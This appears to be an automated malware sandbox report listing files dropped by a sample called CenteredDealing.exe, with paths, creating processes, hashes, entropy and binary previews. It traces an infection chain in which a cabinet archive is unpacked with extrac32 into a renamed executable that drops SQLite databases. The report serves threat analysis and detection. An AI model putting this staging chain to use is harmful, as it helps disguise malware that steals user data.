                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):114688
                                                                                                                                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              C:\ProgramData\8ycbs\kf37qimym

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                                                                                              Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              C:\ProgramData\8ycbs\lfua1d

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):98304
                                                                                                                                                                                                                                                              Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              C:\ProgramData\8ycbs\nozukfct0

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              C:\ProgramData\8ycbs\pzukxl

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):294912
                                                                                                                                                                                                                                                              Entropy (8bit):0.08436842005578409
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
                                                                                                                                                                                                                                                              MD5:2CD2840E30F477F23438B7C9D031FC08
                                                                                                                                                                                                                                                              SHA1:03D5410A814B298B068D62ACDF493B2A49370518
                                                                                                                                                                                                                                                              SHA-256:49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
                                                                                                                                                                                                                                                              SHA-512:DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                              Size (bytes):947288
                                                                                                                                                                                                                                                              Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                              MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                              SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                              SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                              SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                                                              • Filename: over.ps1, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: MatAugust.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: 6684V5n83w.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: vlid_acid.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: AquaPac.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: 0442.pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: installer_1.05_36.5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: @Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: !Set-up..exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\d

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):553082
                                                                                                                                                                                                                                                              Entropy (8bit):7.999632931333854
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:12288:nLIkNWuYx5ChEy+1X/0XDjbU8FnJzG4RXx9n7kP1JAvEEvDu+7X:nPM1x5lvXco8FJzzXcP1JWvxr
                                                                                                                                                                                                                                                              MD5:E4B81AE7DDC3C4BDA8F848165607E1FD
                                                                                                                                                                                                                                                              SHA1:4F72902129AA422FFB1EEA08EF2791D6063F855B
                                                                                                                                                                                                                                                              SHA-256:6110FDF4CE25C3DBE2B4071ED01D61C22074ED4C9007FC84ACF52A7556E1238B
                                                                                                                                                                                                                                                              SHA-512:6ABCCD18805A5E6E5352092953E37A678B38C90EDBB48DA42105114A1E0DC33BE45F3EFF597C5AF3CCEED7855CD915C87FB5869A6E967B691A307E78C8C046D6
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:..I.I. ..R.._F$?.}gt.P..&...}0D.!.=..P.....K...N<..>%l...{0..@..>...vKt.....d..n.C.d....t.B....L.=.Z.D.WpV.....^.6\.v........N:..'....}...5..i;Bv.]..A6.`....!..4._..8...iq}. +w.(..3....`..j5Ss.].b.M.....v......?..Dn.=..u...d~r.zP.-om.,...S.Y.....no...N.....M..a?....YA>a...TR....-...V n)d......`...,0:KS..o..Wp..V.i..=0.....\.......z..w...}*.........O..=f.M...[{).{....yw%...e...HIR.[...w..=".]/&.[V-1.*.Y....0..1.. D...._an.4....h\..5..-7...K.).|....Q:J0..d.$.W..........>...E....H."..w.#y..L.k.q.b.zn.~.......lv.p...&2*.s....6....U.....h.......+.u....0.........J...Q..-`]\.n...g.....$.v$........S.$.....\....(..-.QC..1,.?..f.B.l.`....J?Q...6c...iK.`......m.N...+.S ...iL.6.=...~I!....*<b..O...XK.bG..bd..."...f&.S.d.........3......t?:rl@...0...{z..<H.....7.7./..).^a......o../O5...m.>.T..^....(9D.z...._..y.XVv.... Xf&...%.......8E.....@^-./.S....I...S..1....y.Ae=../..A......M.......g.j.=KG.P..Ux......Z.....$x.C_ .A.....C...W.8..%2.....$G."<O.D.

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Anaheim

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\CenteredDealing.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):51200
                                                                                                                                                                                                                                                              Entropy (8bit):7.996134997391113
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:1536:yrD2beNrqP00aY+iNqat6Pl1/SM4uW6m9/A:C6barjY+iNLt6jlta4
                                                                                                                                                                                                                                                              MD5:D47D264E45EAE9E710ABE7D637233B58
                                                                                                                                                                                                                                                              SHA1:53739DB46BDC02ABCBE729C543F89A68AEA5F851
                                                                                                                                                                                                                                                              SHA-256:6C95197DFD4D23CAA89C38802FF9D0EC646889F180348E161D467635E4BEADD8
                                                                                                                                                                                                                                                              SHA-512:51CC502781C3204901C6EEFCF6233CEFEF2B99D2D5A63FD047D795619DE7B3D2F0E38B8C7CB32920963232F0CA60ED6F2490984146C662C4CBEF5184F6EEA451
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:e.......".....:...`..v....Y.9.o........Ixm.#%|...t5@......6`.JN.......b.Vh.....s.....bj.g.:.k...9v.`..e.........B=.xRp;..n.j...6>..B._.:.~9{.2`.9d....'.L.F#.'S......x..$."....S5.=....k.9.%MI..C...PT4.._.....w...O#w........t.\3..g:i.t....>h........$...l....l.).......e&....So......t..]...B.Be.+V....b.FJ_T ..$......k./-...'I.....%._..T....;C......-.3?...K.9,?..^YA.Q.....j0i..|.yH..M....`..t.2g...o.*....!..p.RX+.~n.}...Q..A......Uw...D..L.Y.Z*...._J...... y.........>.....Q.#.o.&.......@.3.?..A.l..L..Z.u.....$n.(......'.Cf..9.rQ.5....D..k.p...0..rHNj....(T.V.j.E...A.e..K.....ul...$.........M....m...[(.....e/6$.um.......0.....mw.r.... .!.^!.......Z.=.>q.l.E8x.........P.~......V.......O....S.l./.w*/M}....Ihk..r....+n.....u{..sY7f.KNn..MI...V..Z....).V.bmh..:.).)..N...Xw.*..J..[...a.l+zJX"r..zQ.bM..XF.?.......@.%..[..u./E...k6....fY|.vU....3N.......n.H.Yp.3...P&.......>....M..{~..K........jB.}t}.....<?(.ZM9...Q...C...hh..X ../)-...

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Architecture

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):2488
                                                                                                                                                                                                                                                              Entropy (8bit):5.333442326623889
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:48:59n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLVJcd2u+1:zSEA5O5W+MfH5S1CqlVJcIn
                                                                                                                                                                                                                                                              MD5:3A19F105F8D5FEC8C6A8D87CB00FA6F3
                                                                                                                                                                                                                                                              SHA1:0800FA54FCC35081296B0A5917C724AB4F8EA858
                                                                                                                                                                                                                                                              SHA-256:C76AD62BD8428160A4A87AD0A1D4971A93B6A7EAD0A807260E2DEEF7376C8E32
                                                                                                                                                                                                                                                              SHA-512:9BCA68DE1A85C68D6F06A3849E44FEA0E84B0EB3D3D8DE7A61D3658920D46C8E8BE9F914254BBF3307084B6B1E707F3EC87128D25BB3841BF0D5ADEC72CCD7A0
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:Borough........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Assumptions

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\CenteredDealing.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):72704
                                                                                                                                                                                                                                                              Entropy (8bit):7.997711091236596
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:1536:8uaZ2xT3ltgrK6cj0oX/bEUFk24ZFMnl+unTau3rJxZBF/t4:DaQxTVCKzX/bEUh48ljnmYrB/t4
                                                                                                                                                                                                                                                              MD5:7EDC088EA18D136349CE4CD9F745A697
                                                                                                                                                                                                                                                              SHA1:8608732CE65DCFD2C7D944C565FB8B791A7D7D9A
                                                                                                                                                                                                                                                              SHA-256:4006413ABDC83DDD16E4FC84DE95D3A228EAEAA4FF60957CDD00547F4F3CF938
                                                                                                                                                                                                                                                              SHA-512:BD4355C4B55895D069A793610FC132D0D0E2A6C6B786C6405A0A096B61E9FDBC7C19BB86D0735AD8437B1B60289C67C0E43923B1354DC27EB738CE42BF5D88E1
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:H.S...3..6O.qVt...$.xr.....2....e<...f.G./.t..U.. .2.O.)..."XJ....l......!/..i.'...m..........;..b.>?c..y.;.`S..%......NvO...._.X..'....@........O..@.S...&$Bs..q.(..h........`q.......)...!.<H.A..J..;+;b..%o..X...z......Tt..Ws,..... ..e.......pK....^...q...s%(..I.R.>..>S\..d!D|c...w1.>ou0...c8,.j....t.i.`..mZ.u....|....c....ZYM...\p..sq .u.*..r.....TC.....1../_p..-3.HA=`!...wNgOd.qs.l.P....'"...^..@..}.Z.Pk..>..gZ..#..>..t..Ck.PN.vy0-4I1.;.eA........f....h...W...3.... ..!.)...3.v..#t;..D.\.=.b..t.~....].....l.spDqi-...;S.....u2{...gf..+..8o...........*].wt._.#M..4.$^............#"..&...qw..]...5...}...u.2.F.....q.Xp3.#..d..._...[.*L....`.b...m"!....7.w.,..w.a._..qj.f.0Nu....=<...&..-.....C.}q.e..._.G....4!,X.....>...6.p..(Lw.g.,%q'Dk....;&.T..<2.E....+.i...j?8_...A1:....q..P..........;B~.......$XGu...OB..S....I....t].q..W>..N..)..../..O..U.....P..]....j.A.... .Sx./.Vj..k..215.....4.~....:Z..^.z...s.d..o,...@...U.i7..29..w.<...7...V.n

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Bridal

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):133120
                                                                                                                                                                                                                                                              Entropy (8bit):4.733916021488669
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:768:Ux/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3EYr8W:UdKaj6iTcPAsAhxjgarB/5el3EYr/
                                                                                                                                                                                                                                                              MD5:5FD9525979AD66C9D36FF94F2B4B52F6
                                                                                                                                                                                                                                                              SHA1:495625B20C9021814D31F5DD00C5DCE9624F2466
                                                                                                                                                                                                                                                              SHA-256:6E27A1BF8E7342064796FC5F06126A9970D4222B358EC345381317A686149160
                                                                                                                                                                                                                                                              SHA-512:DC7BF631D30E12FFD70D1DF469411AB0CF1EC497E5F6E574800F546EC2E85E4DFFF4D3A5D5EC459948384E333B468F5DC291ECE0A86BDE2C3F9951B0808B4E04
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.r.=.=.=.=.r.r.=.=.=.=.=.=.=.r.=.r.=.=.=.=.r.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.r.=.=.=.=.r.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.r.=.=.=.=.r.r.=.=.=.=.=.=.=.r.=.r.=.=.=.=.r.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.r.=.=.=.=.r.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.r.r.>.>.>.?.?.?.?.?.?.?.?.?.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.r.r.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.A.A.A.A.A.A.A.A.A.A.r.r.r.r.r.r.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cartoons

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):78503
                                                                                                                                                                                                                                                              Entropy (8bit):7.044613853727578
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:LWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:LWy4ZNoGmROL7F1G7ho2kOb
                                                                                                                                                                                                                                                              MD5:5C6F41C0268628634F15322DCB795D06
                                                                                                                                                                                                                                                              SHA1:903F752982685C9BF026F32633BDEB8CB1698D2E
                                                                                                                                                                                                                                                              SHA-256:D72C7C02B285FAB500E4C44697E9929ACB3164A36933390E4280A2927B2AD7B0
                                                                                                                                                                                                                                                              SHA-512:9381D110BC2E0FB1BE70E24E165802DA2F0DC924BEE237497C93CD31DB685E8583E0C0446D96A868DB8FAF285CF318A71E7B1233B4024CB42AF6A6982982F36D
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:....................................................?..................................................................(... ...@........................................................}..............f...]......g.............m...^..............h...g..............t......f...a...........s....................._...............m...b.....................{.......z...|.......................e...y...................p.......~...{.......`.......d.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dodge

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\CenteredDealing.exe
                                                                                                                                                                                                                                                              File Type:Microsoft Cabinet archive data, 489057 bytes, 11 files, at 0x2c +A "Sends" +A "Bridal", ID 9186, number 1, 29 datablocks, 0x1 compression
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):489057
                                                                                                                                                                                                                                                              Entropy (8bit):7.998492788521347
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:12288:BgPIcqjh190RYzhItzlG5Tv/RQC8PvwL6r0xVbL:qLw19VIWh5fIK6k
                                                                                                                                                                                                                                                              MD5:C26A460497E43B38F8321C639581944B
                                                                                                                                                                                                                                                              SHA1:CBC0EA8D32050E83CC987065F15C7FC242E232F7
                                                                                                                                                                                                                                                              SHA-256:D516337A6B25EEEBFC7399C6E39413B7A21526FCE7FA5E1273968AAA83FBAF47
                                                                                                                                                                                                                                                              SHA-512:745F4C89DB82B05A1D306C88CA0BD8A01D6F1ADA70BD702981FD0A708684D5408E0885B93C5F79EB21D27A11CCF78D2BEBC36894C3D67CE96B4AD79876609A37
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:MSCF....av......,................#..?........X.........Yy. .Sends......X.....Yy. .Bridal......`.....Yy. .Sexuality..2...H.....Yy. .Cartoons..$...z.....Yy. .Root..8.........Yy. .Functional............Yy. .Petroleum............Yy. .Preparing............Yy. .Architecture....._......Yy. .State....._......Yy. .Exhibitions..q.G..CK.}}\TU....`..;......Q.I....LF.....%.j3.#V..wF.^..m...m...n%X.....Qb..X.v..[.......{g.P......_}.{^...<.9..9.^&.(..~.,..^..[..@N0..KI"..6.P...&;]SowP.*..G.....?N....X..W.o....Po..Wt.j...%Y....g.a..'.2...`......h.E ...t?b.=I..2......B.Qv...wcS.UKejh.L..~.\.9.r5.E..J.M...3..=...H^..Q...L.....H.:.K/#..1.C..].....7[.U,.ni.P........e..C.../.R.:.1...L+e.(6V......4......FS.z..H8*..YK9.J7!...........J...c.9zJ.......0....`.NH..sGdO.$.URR..1..H8..........:.."X..r.%.j.V..jq..C.r.......>..5..4...._ .G...%<..3R}.....^O..}..U...+........+#)...m......G.......V..5..z.2=v9........."L9......'.aQ.)Lx.......d...."y].pD^g.....9...%.f.I.e.h

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Exhibitions

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):123904
                                                                                                                                                                                                                                                              Entropy (8bit):6.567515078748226
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3072:npmESv+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Ddm:np6vmVnjphfhnvO5bLezWWt/Ddm
                                                                                                                                                                                                                                                              MD5:FFBB082C908BD3E08F3AF18C2D440A0F
                                                                                                                                                                                                                                                              SHA1:FA21533018109D09627C294A3C6200DA35B11C4D
                                                                                                                                                                                                                                                              SHA-256:4A7DB0E32E3FFAE93D27FD9B0AF215A47B82EFD86213A582FBE88F74993E0933
                                                                                                                                                                                                                                                              SHA-512:8C53D635FEE18ECA2D9DE4425BA80B662AB2E7FCCFBD1E419F17A73DBD6E5F6E0B6472B8D0EDF136DA337A539B05210ACBCD92C2BCB1B241BDE23315FB32EDE9
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:E....r..E..@..H.....E.3.E.PQQ.M.....I..u.3.f9.t=.E.P....I...u/.......M...3.P.E...P3.PVPPQ.R.V.m{...E.YP...Q..E.3.Ph.~L.j.Vh..J...X.I............H..|9...D9.t..@8.@......|9...D9.t..@83.U.X..E..].RP...Q(.........M..E.. P..Q.R$.E..u.P...Q<.E..U.RP...QD.E.P.u.SS....I..E..u.P...Q0.E..U.RP...Q...xi.E..U.RP...QP..xX.E.M.Qh....P...R...x9.u..M.......u...<.I....H..D9.8\9.t..@8.X..D9.8\9.t..@8.X..E.P...Q..E.P...Q.....h..........VP.K....E.....U.E........E..E.E.E..].3.U..U.P.U..E.;GG..].....I.....t>.M.......P.L.........PV....I.V..<.I.f9.....t:.M.......P......)...H..D9.8\9.t..@8.@......D9.8\9.t..@8.X..}.._^[t..u...<.I...t.I..M..i5..3.....U.....$......S.].VW.L$.3..C.!|$..|$..p....Z....{...F..D$......0r..C..H...A.....u.....2.....\$...f.........T$......+u.3...B.....-u....3.........Rtg..rtb..AtY..atT..StK..stF..Ht<..ht7..Nt+..nt&..Ot...ot...Tt...t..u........................j.X..j...j ..3.@...u....|$....D$.........f....M....E..@..0...Y....N..T$ ...D$ .A..D$$.A..D$(.A...D$,........$0...

